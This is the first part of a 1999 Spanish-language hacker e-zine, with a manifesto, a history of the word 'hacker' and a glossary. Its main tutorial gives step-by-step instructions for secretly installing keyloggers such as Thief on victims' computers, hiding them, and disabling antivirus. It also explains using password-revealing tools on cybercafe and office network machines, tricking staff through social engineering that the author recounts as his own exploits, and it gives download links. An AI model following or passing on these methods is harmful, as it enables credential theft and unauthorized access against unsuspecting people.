 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _  _ 
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  
 \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  
 /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
 \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  

                                
                                ///////////
       ///      ///             SSSSSSSSSS/            ///  
       kkk/    kkk/             SSSSSSSSSS/            hhh/
       kkk/   kkk/              SSSSSSSSSS/            hhh/
       kkk/  kkk/               SSSS/                  hhh/
       kkk/ kkk/                SSSS///////            hhh /////
       kkk kkk/                 SSSSSSSSSS/            hhh hhhhh/
       kkk/ kkk\                SSSSSSSSSS/            hhh/  hhh/
       kkk/  kkk\                     SSSS/            hhh/  hhhh/ 
       kkk/   kkk\              //////SSSS/            hhh/  hhhh/
       kkk/    kkk\             SSSSSSSSSS/            hhh/   hhhh/
       kkk/     kkk\            SSSSSSSSSS/            hhh/    hhhh/
                                SSSSSSSSSS/                                                                                                                                                                                                                                                                                                                                                                      SSSS/     EEEE/              TTTT\
                                                                                                                                       //////SSSS/     EEEE///////        TTTT\


   1er. E-zine Dominicano                                      
                                              Knowledge's Slaves Hacker
                                              20 de Abril de 1999
                                              Numero 1
 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _  _ 
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  
 \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  
 /_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
 \_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  


   ////////////////////////////////////////////
   \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
   <>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>
   <> Disponible en: http://kshezine.cjb.net <>              
   <>.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.<> 
   <> Editor: MasterCrash                    <>                           
   <>.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.<>                                              
   <> E-mail: mcrash@iname.com               <>                 
   <>.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-..-.<>  
   <> Colaboradores: Por el momento          <>
   <>                ninguno :)              <> 
   <>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<>-<> 
   //////////////\/////////////////////////////
   \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


    Recomendado: Editor de MS-DOS
                    

  ATENCION: No me hago responsable del mal uso de la informacion que se
            expone y expondra en este e-zine, ya que esta se expone con fines
            cientificos y/o educativos.
            Si en algun momento haces un mal uso de esta informacion, debes
            saber que es responsabilidad totalmente tuya.


			Yo nunca he sido maestro de nadie,
                    	pero si alguien desea oirme cuando
                        hablo y cumplo mi mision,
			yo no se los prohibo. 

					Socrates.
					~~~~~~~~					

§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§¤¤§
        
   

/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/
/-/			      /-/ 
/-/	    CONTENIDO         /-/ 
/-/			      /-/
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ 
/-/ Introduccion              /-/ 
/-/+++++++++++++++++++++++++++/-/ 
/-/ Intro al Hacking          /-/
/-/+++++++++++++++++++++++++++/-/ 
/-/ Hackeando Guindouz        /-/ 
/-/+++++++++++++++++++++++++++/-/ 
/-/ Jugando con el Bios       /-/
/-/+++++++++++++++++++++++++++/-/ 
/-/ BackOrifice "The Ultimate"/-/
/-/+++++++++++++++++++++++++++/-/ 
/-/ Anonimato en la red       /-/
/-/+++++++++++++++++++++++++++/-/ 
/-/ Bombas Java		      /-/ 
/-/+++++++++++++++++++++++++++/-/ 
/-/ Protocolos                /-/
/-/+++++++++++++++++++++++++++/-/
/-/ Humor    		      /-/
/-/+++++++++++++++++++++++++++/-/ 
/-/ Noticias    	      /-/ 
/-/+++++++++++++++++++++++++++/-/ 
/-/ Listas de correo          /-/
/-/+++++++++++++++++++++++++++/-/ 
/-/ Resumen del Proximo Numero/-/ 
/-/+++++++++++++++++++++++++++/-/ 
/-/ Despedida		      /-/ 
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/ 
 

@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ KNOWLEDGE's SLAVES HACKER ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%


	
		           //\\_//\\_//\\_//\\_//\\
			   õ ©©©©©©©©©©©©©©©©©©©© õ
			   õ ®®  INTRODUCCION  ®® õ    
			   õ ©©©©©©©©©©©©©©©©©©©© õ
 			   //\\_//\\_//\\_//\\_//\\



     ¡~~~~~\
   //\\     \ 
  “    “     \ Enciendo la mecha...               
 “ kSh  “     ~~~~~~~~~~~~~~~~~~~~~~*" 
  “    “       
   ““““


Hace unos a¤os atras todo me parecia igual, al ver como personas influian
en la vida de los demas; controlados por la mentira y el enga¤o, al ver como
imponian sus reglas, todo esto y mas por la avaricia y codicia de algunos,
los cuales nos privaban de nuestra libertad; reinando un aire de incertidumbre. 
Pero esto llego a su fin al encontrar la verdadera fuente de conocimiento, 
si, una computadora, donde podia realizar lo que realmente queria hacer, 
trataba de aprender mas y mas de ella sacarle el maximo provecho, en busca de 
lo desconocido, algo que yo no pudiera entender, algo que me hiciera diferente 
a los demas; entonces encontre personas al igual que yo, con la misma filosofia,
motivacion, una meta que alcanzar, sin que le importara religion, sexo, raza ni 
idioma. Una sociedad bien unidad llamada "Hackers". 
Donde la informacion es poder y el poder nos hace libres...

Entonces comprendi que debia hacer algo al respecto. Contra los tabues esta-
blecidos por mediocres y poderosos; con el conocimiento a otra parte donde 
cada instante pase a ser una hora sagrada. Dejando que la curiosidad fluya por 
mis venas e insaciable busqueda, leyendo todo material de hacking que apareciera,
he preparado este e-zine con la finalidad de aportar mi granito de arena. 
Resistiendome de manera definitiva a ser una persona comun y corriente. 
Sumergido en esta subcultura; la puerta de entrada a aquello que mas anhelaba.  

Harto de otro maldito carabelita que piensa que lo sabe todo solo por haber 
entrado a la maquina de otro usuario por medio del Netbus formatiandole su HD.
Maldito chiquillo estupido. Maldita rata que hace da¤o solo con la finalidad
de sentirse bien.  

Haz un esfuerzo leal por preservar aquello que deseas, percibiendo hoy el 
el largo y dificil sendero del Conocimiento.

Infrigiendo las leyes del instinto, derrumba los muros, rompe las cadenas que
tanto te alejan de aquello que buscas y que el Gran Hermano como genio 
endiablado no quiere que conozcas.


                                                       by MasterCrash                             
						          ~~~~~~~~~~~
							  (El editor)
                                                            

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  

   

				ªªªªªªªªªªªªªªªªªªªªªªª
    				ª  INTRO AL HACKING   ª
				ªªªªªªªªªªªªªªªªªªªªªªª


        El motivo de esta intro no es mas que para salvaguardar el nombre de
los HACKERS y unirme a la lucha, ya que los medios han desacreditado totalmente
la imagen de los mismos.
        Dedicado a todas las personas ignorantes y es especial a los medios de
comunicacion que no saben diferenciar lo que es un Hacker y un Cracker.


                         ORIGEN DEL TERMINO HACKER
                         ~~~~~~~~~~~~~~~~~~~~~~~~~             

        Su origen empieza con un grupo de alumnos del prestigioso y conocido
Massachusetts Institute of Technology (MIT), en su mayoria miembros del Tech
Model Railroad Club (TMRC, Club de Modelos de Trenes, www.mit.edu/activities/tmrc/)
que en 1959 se apuntaron al primer curso de programacion que la institucion
ofrecio a sus alumnos, y que se enamoraron de los ordenadores y delo que se
podia hacer con ellos. Es muy importante recordar que en aquel entonces los
ordenadores eran unos aparatos carisimos y descomunales que ocupaban salas
enteras (y no precisamente peque¤as).

y que necesitaban complejos sistemas de aire acondicionado y suministro electrico
para funcionar y subsistir, por lo que el acceso a estos estaba realmente
restringido, y en pocas ocasiones era el usuario final el que manejaba el
ordenador directamente, sino que habitualmente se veia obligado a dar sus
programas a los operadores, que a su vez se encargaban de introducirlos en el
ordenador y de devolverle los resultados.  

A los chicos del TMRC esto no les bastaba, y aparte de ingeniarselas para que
en ocasiones les dejaran introducir directamente programas a ellos mismos y
para tener tanto contacto como les fuera posible con el ordenador, no les
suponia ningun problema el usarlo desde una sala de terminales a la que en
realidad no tenian acceso de modo oficial colándose en ella por las noches;
lo que les importaba era poder usar el ordenador, sin preocuparse de las
menudencias administrativas que dictaban una forma oficial de acceder a el. 

Poco tiempo despues de aquel curso llego al MIT el TX-0, un ordenador
revolcuionario para la epoca, y el grupo de pirados de la informatica del MIT
tuvo la suerte de que Jack Dennis, un antiguo miembro del TMRC y ahora
profesor del MIT, les diera acceso prácticamente ilimitado a esa maquina.

Para ellos, una de las principales ventajas que tenia esta era que en lugar de
interactuar con los usuarios mediante tarjetas perforadas, tenia un teclado
gracias al cual era posible trabajar directamente con el,lo que les permitia
ver directamente el resultado de su trabajo, con lo que cada vez empezaron a
pasar mas y mas tiempo con el ordenador y pronto eran capaces de hacer cosas
con el que ni sus dise¤adores hubieran creido posibles; fue en este entorno
cuando el termino HACKER se empezO a aplicar a aquellos pirados de la informAtica
capaces de hacer maravillas con un ordenador.

En cualquier caso, la contribucion mas importante de este grupo de hackers a la
historia de la informatica no fue la de adoptar ese termino sino la de ser los
primeros en pensar diferente acerca de como se usaban los ordenadores y de lo
que se podia hacer con ellos, y, sobre todo, la creacion de una etica que
regia su comportamiento la " Etica del hacker"  que aun sigue vigente hoy en
dia . De ahi la relevancia de este grupo para entender lo que es un hacker hoy
en dia y cuales son sus motivaciones.


Definicion de cada uno y sus diferencias...

        Hackers :
        ~~~~~~~
                  Individuos muy sabios. Numerosas veces saben varios
lenguajes de programacion, trabajan extensivamente con las entraÏas y el
exterior de UNIX, tienen una firme comprension sobre todas las implementaciones
y protocolos de TCP/IP.  Se mantienen actualizados en todos los temas de seguridad
que involucren computadoras. Entrar a un sistema para un hacker es una aventura,
una emocion, es un reto que pueden enfrentar. El hacker obtiene bastante excitacion
al explorar el sistema desde el interior/exterior buscando vigorosamente malas
configuraciones, bugs(fallas), y hoyos en el sistema operativo que los permitieran
entrar a una maquina.  Una vez en el sistema el reto ha sido acompletado y han
triunfado en entrar.  Es contra la etica de los hackers alterar cualquier informacion
excepto los archivos de bitacora (log files) que son necesarios para limpiar sus
huellas. No tienen necesidad ni deseo de destruir informacion como los
maliciosos crackers. Estan ahi para explorar el sistema y aprender mas.

        El hacker tiene un deseo constante y sed de conocimiento que crece
intensamente conforme su aventura progresa.


	CRACKER  :  Existen dos tipos:
        ~~~~~~~

	Tipo a  : Los chicos que se dedican a crackear juegos o mas bien dicho
a romper claves via software , crean cracks para transformar software shareware
a original etc...(buenos tipos)

        Tipo b  : Aquellos tipos que hacen hacking con el solo motivo de 
destruir informacion, borrar discos .. etc. todo con fines destructivos
es por la culpa de estos tipos , la mala fama que se han ganado los
hackers ya que siempre los confunden .(die cracker maldito)



 [Definiciones mas comunes]
 ~~~~~~~~~~~~~~~~~~~~~~~~~~


 PUERTO-->Un puerto de ordenador es un lugar donde la informacion entra o sale
	  del mismo, ejemplos de puertos son tu monitor, que manda informacion 
	  fuera, tu teclado y raton, que envian informacion dentro, y tu modem, 
	  que envia y recibe informacion.


 ADMINISTRADOR--> Persona que se encarga de todas las tareas de mantenimiento
                  de un sistema informatico.

 PING--> Es un comando que manda una sonda de tu ordenador a otro ordenador 
	 para ver si esta encendido y conectado a la misma red a la que estas
	 tu. 
	 
 BACKDOOR--> Puerta de entrada trasera a una computadora, programa o sistema
             en general. Sirve para acceder sin usar un procedimiento normal.

 WANNABEES-->(Querer ser). Son los verdaderos aprendices de hackers ... 

 CRACKEAR--> Arte de desproteger un juego o programa.

 CRACK--> Son los archivos que nos ayudan a desproteger un determinado juego
	  o programa.

 PATCH--> En ingles, parche. Modificacion de un programa ejecutable para
          solucionar un problema o para cambiar su comportamiento.

 LAMERS--> Nombre generico, para los tontos informaticos, significa tonto,
	   novato, que sabe poco. La palabra viene de los tiempos del spectrum, 
	   y se aplicaba a los programadores que copiaban el codigo de otros y 
           lo firmaban como propio. Tambien podemos agregar chikos que andan 
           por ahi en irc, dandoselas de hackers sin saber nada ... son 
	   aquellos que creen que por tener un mailbombing, netbus o por 
           tener un lindo script de IRC pueden hacerse llamar hackers. 


 TROYANO-->  Es un tipo especial de virus informatico cuya finalidad es 
             ocultar su verdadera identidad, mostrandose como inofensivas 
	     aplicaciones o disimulando su presencia entre los programas que 
             forman una aplicacion genuina. Consiguiendo su primer objetivo:
	     instalarse en el ordenador atacado facilitando el acceso a 
	     terceras personas a los recursos del sistema; ya sean datos, 
	     procesos o dispositivos. 

 BLUE BOX--> Aparato (o programa de computadora) que emite tonos
             multifrecuencias que permiten controlar las centrales
             telefonicas. Se usa para lograr comunicaciones gratuitas,
             entre otras cosas.

 BUG-->      Un error en un programa o en un equipo. Se habla de BUG si es un
	     error de dise¤o, no cuando la falla es provocada por otra cosa.

 CALLING CARD--> Tarjeta de credito emitida por una compa¤ia telefonica
                 que permite hacer llamdas y pagarlas despues.

 CARDINF--> Arte de abusar de targetas de credito.

 CLAVE--> Se usa como sinonimo de password, tambien puede ser el codigo
          que permite desencriptar un dato.

 CORTAFUEGO (FIREWALL)--> Computadora que registra todos los paquetes de
                          informacion que entran en una compa¤ia para,
                          una vez verificados, derivarlos a otra que
                          tiene conexion interna y no recibe archivos
                          que no provengan de aquella.

 DIAL-UP--> Linea de datos que permite a un usuario acceder por modem a
            una red o a una computadora.

 LOGIN-->   Procedimiento de identificarse frente a un sistema para luego
            usarlo.

 PASSWORD--> (contrasena) Palabra que sirve para verificar que un usuario es 
	     realmente quien dice ser, por esto mismo, el unico que debe 
	     conocerla es ese mismo usuario.

 LOOPS--> Circuitos. Un LOOP de telefonos son dos telefonos que se comunican
          entre si.

 OUTDIAL--> Modem de salida dentro de una red, que permite a un usuario de
            la misma salir a la red telefonica convencional. Los que
            permiten hacer llamadas de larga distancia se llaman "global
            outdial" (outdial globales) o GOD.

 PBX--> Private Branch Exchange. Centrales telefonicas internas de Empresas.

 RED BOX--> Aparato que permite enga¤ar a un telefono publico norteamericano
            para que se comporte como si se depositaran monedas en el.

 UNIX--> Sistema operativo multiususario, es decir, que todos los usuarios tienen
         que almacenar sus programas, ficheros, etc., en el mismo disco fisico. 


 ROOT--> Cuenta del administrador en UNIX. Es la mas poderosa, permite el
         acceso a todo el sistema.

 SUPERUSUARIO--> Es la persona encargada de la administracion del sistema.
                 Sus funciones principales:

                 1) Cargar (abrir) el sistema y desconectarlo (cerrarlo).
                 2) Crear y eliminar usuarios.
                 3) Hacer copias de seguridad de los ficheros en los discos.


                                                       by MasterCrash                             
						          ~~~~~~~~~~~

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  



			ªªªªªªªªªªªªªªªªªªªªªªª
			ª Hackiando Guindouz  ª
			ªªªªªªªªªªªªªªªªªªªªªªª



       Komo ya sabran la seguridad en makinas ke tienen Guindouz instalados
la seguridad es nula. Para aquellos que no lo saben y siguen pensando que el
pecado de Adan y Eva fue comerse una jodida manzana, bueno como el rollo no
es religioso sino sobre la vulnerabilidad de los sistemas X-Guindouz.
Hay una inmensa cantidad de formas de como entrar en una makina con dicho
sistema operativo, ya ke el tio Bill solo se preocupa por ver como se ve y no
por ofrecerle seguridad llamesele vi‡timas/‡lientes, bueno la te‡nica ke vamos
usar es instalado keyloggers en las makina de la vi‡tima.

Se ke muchos se preguntaran ke es un Keylogger, bien pa los ke no saben, no
se desesperen y sigan leyendo mas abajo y los demas salten estas lineas :)


<<<<<<<<<¨Que es un Keylogger?>>>>>>>>>


Es un programa creado con la finalidad de capturar las pulsaciones del teclado.

Existen muchos Keyloggers en Internet, estos difieren en tama¤o, efectividad,
y los que pasan desapercibidos a los ojos de nuestras viCtimas. Si cuentan 
con estas caraCteristicas, podras saCarle mejor partido, ya que de eso se 
trata el Hacking cuando puedes burlar la seguridad sin dejar ningun rastro de 
tus actividades y de demostrar que tan bueno eres, esto claro sin hacer ningun
tipo de da¤o.  >;->


<<<<<<¨Donde los puedes encontrar?>>>>>>

Estos no seran una tarea difiCil loCalizarlos, ya que por la red se enCuentran 
por montones; en nuestra pagina he ColoCado unos cuantos, por si deseas bajarte 
alguno y por que no todos :)
Si en verdad te interesa esto del Hacking, ha de suponerse que seguiras 
investigando por tu kuenta, en tu insaciable busqueda si en verdad quieres 
alcanzar un nivel mas aceptable.

Nota: Al final de este articulo se encuentran algunas direcciones donde 
puedes conseguir estas utilidades.
 

Comencemos con el primero
^^^^^^^^^^^^^^^^^^^^^^^^^

Keylog95  
~~~~~~~~
Capturador de teclado. Una vez activo, se dedica a capturar todo lo que se ha 
escrito, y lo guarda en un fichero. Lo puedes utilizar en ordenadores publicos.

Este es bien facil de usar solo tienes que introducir las librerias
(archivos con extension .dll) en el directorio c:\windows\system ).

Creas una carpeta llamda "win", una vex hecho corres el ejecutable, entonces 
se genera/crea una carpeta dentro del directorio antes creado, llamada "Logx"     
Entonces dentro de esa carpeta se crea un archivo .ww9, el cual se graba con
la fecha en que se corrio el Keylog y es el que contiene las teclas que 
pulsaste.
Finalmente abres el archivo con cualquier editor de texto (notepad, wordpad, 
word).

Aunque tiene un incoveniente y es que se coloca en la barra de tareas del 
boton inicio y una ventana que aparece en el escritorio.
Antes mencionaba la palabra inCoveniente, ahora bien puedes utilizar un poCo 
de inteligencia :)


<<<<<<¨Como?>>>>>>
                      
Bien senCillo dismuyes lo mas que se pueda el tama¤o de la ventana, luego 
arrastras la ventana en el margen inferior derecho de la pantalla y la ocultas
detras de la barra de tareas del boton inicio.
Bien hasta aki todo bien.


<<<<<<¨Entonces que hago?>>>>>>


Nada utilixas algo de ingenieria soCial, le dices a algun amigote, o chiCo
carabelita que no tienes pass para conectarte a internet, y le dices que 
necesitas ver tu correo o ke tienes una direccion bien cool, y lo invitas
a tu casa para utilizar tu Pc o kualkier otra cosa, no se, lo ke te venga en
mente.

Manos a la obra abre unas cuantas ventanas, para ke pase desapercibido el 
Keylog, ya sea el Navegador, el explorador de Guindouz, lo que sea etc. etc.
Y esperas ke la victima digite su pass y bingo!
Es todo tuyo.

Nota: Usa tu imaginacion, puedes utilixar kualquier teknica, pero sabes
que la ingenieria social es lo maximo, siempre llevala consigo. Ya que 
te servira de mucho en tus andanzas hack.
 

 IK  
 ~~
Parecido al Keylog, pero este cantaba mas, luego siguio mejorando, nuevas 
versiones salieron hasta que este pasa totalmente desapercibido por los 
ojos de la victima, realmente en lo personal no lo utilize mucho solo
me intereso para saber su funcionamiento, ya saben soy Esclavo del Cono-
cimiento ;-)
La razon es simple pues pase del Keylog a utilixar el Thief, que lo detallare
mas abajo para no salirme del tema.



THIEF
~~~~~
Creo que es el mejor de los antes mencionados ya que posee las caraCteristicas
detalladas en la parte de arriba.

Y nos sera de mucha ayuda, ya que las viCtimas han ido tomando conciencia, 
asi komo tan bien las preCauCiones neCesarias y ya no son tan carabelitas 
komo antes :); cualkiera! solo con ver la faCtura al final de cada mes >;->
Calma, calma no hay porque preocuparse ellos avanzan y nosotros tambien :)
Ellos dan un paso y nosotros damos tres. Hay aventura pa rato!.


1) Bien entonces instalamos las librerias en el directorio system, corremos 
el ejecutable llamado thief, que en realidad es un troyano. 


<<<<<<¨Que es un troyano?>>>>>>


Pa' los ke no saben que es un troyano, nos remontaremos ha unos cuantos 
milenios de a¤os espero que la clase de historia ke te dieron en la escuela,
te haya servido de algo y sino aki estoy yo, tu panita full para ayudarte :)
Ya sabes que est0 es WYSIWYG  " Lo que ves es lo obtienes". 

Bien vamos con la definicion.

Es un tipo especial de virus informatico cuya finalidad es ocultar su
verdadera identidad, mostrandose como inofensivas aplicaciones o disimulando 
su presencia entre los programas que forman una aplicacion genuina. Consiguiendo 
su primer objetivo:

<<<<<<¨Cual es ?>>>>>>

Instalarse en el ordenador atacado facilitando el acceso a terceras personas 
a los recursos del sistema; ya sean datos, procesos o dispositivos.

Bien una vex aprendido el concept0 de ke es un troyan0, y ke de seguro
investigaras y/0 abundaras mas sobre el tema  por tu propia kuenta.

Y sabiendo ke se trata de un virus el cual no hace da¤o y lo puedes ejecutar
en tu makina sin ningun temor.


2) Pincha en el otro ejecutable llamado "Pwtmanag.exe " 
Aparecera un cuadro de dialogo.

3) Activas la casilla "Load Automatically at Startup" que esta ubicada en el 
   margen inferior derecho para que se active cada vex que inicies la makina.
4) y por ultimo " Run Now ".
5) Reinicias tu makina, digitas tus passwords. 
6) Entras de nuevo al programa.
7) Aparecera el mismo Cuadro de Dialogo, pinchas el boton "View Password Logs".

Vex ke sencillo, ha diferencia de los otros keylogs mencionados tiene la
ventaja de ke solo guarda los pass introducidos en la makina y no todo lo que
digita la victima ya que el 90% no nos interesa, en pocas palabras "basura".
Ahorrandonos el trabajo, y el tiempo que en verdad es importante cuando te
encuentras en situaciones extremas, ademas que no tienes que estar jodiendo
enviando el archivo con los pass a tu cuenta de correo. 

Creo ke me he salido un poquito de la tematica ya que me gusta mas la 
practica y no estar teorizando mucho, pues bien este maravilloso programita
guarda todos los pass que digites en la makina, como son : Los de Guindouz, 
los de tu cuenta de internet, e-mail, icq, los que introduces haciendo telnet 
etc. etc. etc...   
 
Hasta el momento el unico antivirus que lo detecta es el Mcafee la version 
4.02, segun mis pruebas ya que es el que tengo instalado en la makina.
Ah ah todavia no termino, sabia ke me faltaba algo para ke te pueda funcionar
tienes que desactivar el antivirus o.k.

Keylog 95
http://www.vanhackez.com/h/FILES/spy/keylog/keylog95.zip
Capturador de teclado para W95.

Keylog 2
http://www.vanhackez.com/h/FILES/spy/keylog/KEYLOG2.ZIP
Capturador de teclado. Windows 3.X/W95

Log
http://www.vanhackez.com/h/FILES/spy/keylog/log.zip
Keylog95 retocado.Totalmente oculto.

Invisible Keylogger
http://www.amecisco.com
Capturador de teclado. W95/98.
	
				
			\_\_\_\_\_\_\_\_\_\_\_\
			/_/_/_/_/_/_/_/_/_/_/_/
			\_\_\_\_\_\_\_\_\_\_\_\
			/_/_/_/_/_/_/_/_/_/_/_/
                        «                     «
			¢ OTRAS HERRAMIENTAS  ¢
                        «                     «
			/_/_/_/_/_/_/_/_/_/_/_/
			\_\_\_\_\_\_\_\_\_\_\_\
			/_/_/_/_/_/_/_/_/_/_/_/
			\_\_\_\_\_\_\_\_\_\_\_\



Snadboy Revelation
~~~~~~~~~~~~~~~~~~

Programa que revela los passwords escondidos mediante arteriscos, por ejemplo 
en el acceso telefonico a redes. Arrastrando la mira hacia los arteriscos
revela automaticamente el password.
Este programa lo puedes encontrar en mi pagina, asi como en la siguiente url:

http://www.snadboy.com

Bien aki tienes una tecnica, que he utilizado con exito.

Eliges tu objetivo, ke en este caso es donde ofrezcan servicio de internet
(cibercafes, biblioteca, en tu universidad etc. ) y por cierto! que los 
empleados sean bien carabelitas (lamers, novato) :) .
Todo bien hasta ahora.
Pero....

<<<<<<¨Como corro el programa en la makina de la victima?>>>>>>
Sencillo...

1) Mandas el Revelation a tu cuenta de correo, ya que sabemos con anticipa-
cion ke no te permiten el uso de diskette.

<<<<<<¨Entonces que hago?>>>>>>
¨Que crees? Pones en practica algo de Ingenieria Social :)

2) Le dices que no sabes ni papas de internet y ke interesa mas ke nada aprender
y ke si te puede facilitar unas cuantas urls para empezar.
Lo mas probable es ke te diga que todas terminan con .com, y ke digites www +
la palabra a buscar  + .com ; ej: www.gigante.com
 
Nota: Sacado de la vida real (experiencia propia).

<<<<<<¨Con cuales obstaculos me puedo encontrar?>>>>>>

Existe la posibilidad que el pass no este grabado, pero no te desanimes!
Estoy aki para ayudarte.

a) Un click en el boton inicio.
b) Luego en configuracion.
c) Eliges panel de control.
d) Doble click en Contrase¤as.
e) Un click en Aceptar.
f) Finalmente reinicias la makina.
g) Activas la casilla "Save Password".

Y esperas a ke el chiko(a) carabelita digite el password.

3) Pasado unos cuantos minutos te desconectas...
4) Pasas la mira por los asteriscos y  la sueltas.
   Enjoy!  
  

Otra experiencia que tuve fue con una red conectada con Wingate.
Para los que no entienden que es Wingate; ahi les va la definicion.

    Wingate
    ~~~~~~~  

Es un servidor Proxy/Firewall (cortafuegos) que puede ejecutarse en un solo
ordenador Windows95 o WindowsNT, y permite compartir una sola conexi¢n (RDSI,
Modem, Ethernet, etc.) en toda tu red local. Aunque WinGate se ejecuta en una
sola m quina Win95 o NT, se puede acceder a ‚l desde cualquier estaci¢n con el
protocolo TCP/IP instalado, incluyendo Windows para Trabajo en Grupo, Macintosh
y otros. 


Ahi les va otra tecnica.

Un dia en la tarde fue un amigo buscandome para ver si podiamos obtener el 
pass de acceso a internet, pues como tenia mucho trabajo ese dia le dije
ke no y que si podia ser el dia siguiente a lo ke el repuso ke iba a intentar
pillarlo, si no iriamos el otro dia.

Sus intentos fueron fallidos, pues como era en una red tuvo que utilizar una
terminal y como a de suponerse el pass esta en el servidor.

Pues bien al otro dia me llama y me explico la situacion y como me encantan
los retos decidi ir.
Entonces paso lo siguiente el chiko carabelita ke en ese momento estaba utili-
zando el servidor nos dijo ke utilizaramos cualkiera de las otras terminales.
Ke jo er :{. 

Luego de estar diez minutos metidos en Internet, sin esperanza alguna; 
el Wingate comenzo a dar problemas; que bien >;->. Pues la version ke tenian
no era muy buena.

Entonces me llego una idea magnifica a la cabeza. A modo de queja le dije
que el Wingate me estaba dando problemas y que no me permitia accesar a ninguna
pagina. Ej: Digitar una url que haya sido removida( error 404).

Le hice una preguntas de esas estupidas, ya saben que si el servidor era mas
rapido ke las demas makinas entre otras cosas; a lo que el me respondio que si,
entonces le dije ke si podia utilizar la makina principal. 

Me respondio ke si y ke no habia problema. Entonces entre a mi kuenta de correo
baje el Revelation.

Y el resto es historia.

Nota: Espero ke les haya gustado esta teknica y recordarles ke al igual ke la
anterior el empleado debe ser un chiko(a) carabelita. 


Dripper
~~~~~~~

Otra herramienta al igual que la antes mencionada, pero a diferencia del
Revelation no hay que pasar ninguna mira. Es facil de utilizar y pienso que
no vale la pena abundar mucho sobre ella.

La puedes encontrar en la siguiente url, asi como otras
herramientas de interes:

 WWW.AGGRESSOR.ORG


 Unhide
 ~~~~~~

Esta es mejor que la antes detallada, ya que ocupa muy poco espacio, mas facil
de usar etc.

La puedes encontrar en la siguiente url, asi como otras
herramientas de interes:

 www.webdon.com


Tips: Lleva estas herramientas siempre contigo.

<<<<<<¨Como?>>>>>>

Pues mandalas a tu kuenta de correo con un attachment, asi de facil :)




                                                       by MasterCrash                             
						          ~~~~~~~~~~~
									       														
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  
/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\  


			ªªªªªªªªªªªªªªªªªªªªªªª
			ª JUGANDO CON EL BIOS ª
			ªªªªªªªªªªªªªªªªªªªªªªª


Es de gran importancia ya ke a la hora del hacking, lo vamos a necesitar 
para nuestros propositos >;->
